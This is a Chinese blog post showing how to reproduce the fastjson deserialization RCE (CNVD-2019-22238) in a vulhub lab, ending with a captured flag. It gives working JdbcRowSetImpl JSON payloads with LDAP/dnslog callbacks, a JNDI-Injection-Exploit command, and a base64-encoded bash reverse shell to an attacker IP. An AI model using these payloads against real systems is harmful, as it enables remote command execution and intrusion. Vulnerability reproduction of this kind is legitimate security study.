您现在的位置是:首页 > Javascript
当前栏目
CNVD-2019-22238 fastjson反序列化漏洞
2023-02-18 16:48:05 时间
漏洞简介
事项 | 描述 |
---|---|
漏洞概述 | fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。 |
影响范围 | 1.2.48以前的版本 |
漏洞编号 | CNVD-2019-22238 |
漏洞搭建
这里使用vulhub的fastjson/1.2.47-rce进行复现。
访问http://192.168.146.167:64725/
漏洞复现
使用工具进行检测
发现dnslog有数据,说明存在漏洞。
查看对应的payload
[6]{ "a": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://test6.j6i2jc.dnslog.cn/Exploit", "autoCommit": true }}
然后再进行抓包,添入payload,手工再测一遍。发现确实存在。
验证有漏洞之后,就尝试反弹shell。这里使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar进行进一步的漏洞利用。
反弹的的ip和端口是192.168.146.161和10000
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNjEvMTAwMDAgMD4mMQ==}|{base64,-d}|{bash,-i}
执行以下命令,进行反弹shell。
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNjEvMTAwMDAgMD4mMQ==}|{base64,-d}|{bash,-i}"
由于不知道对方java的版本,所以就一个个试。
然后发现漏洞利用成功
{ "a": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://192.168.146.161:1389/5jdmca", "autoCommit": true }}
成功反弹了shell。
进入tmp目录下,成功拿到flag。
相关文章
- JavaScript实现:如何写出漂亮的条件表达式
- 前端基础(5) - JavaScript入门
- JS贪吃蛇小游戏
- servlet与ajax数据交换(json格式)
- 云数仓 Firebolt《Assembling a Query Engine From Spare Parts》Paper 总结
- javascript 算法系列之 树 必出精品(1)
- Node gRPC 初印象 && 跑起来 (1)
- 测试之路 pytest接口自动化框架扩展-json数据解析
- 从零开始学python | 什么是Python JSON?
- jstack和线程dump分析
- Node.js 19 已正式发布
- Node.js 是过去十年最具影响力的服务器技术吗?
- 2022 年 JavaScript 从 ES6 到 ES12 新特性汇总
- POSTGRESQL 15 从等待中被驱逐的JSON新功能,只能祈祷 PostgreSQL 16
- Jmeter系类(33) - JSR223(3) | java常用脚本
- babel如何解析jsx
- js刷leetcode动态规划(图文视频讲解)
- JavaScript刷LeetCode心得总结
- js分类刷leetcode.动态规划
- 通过JS调用设备原生分享功能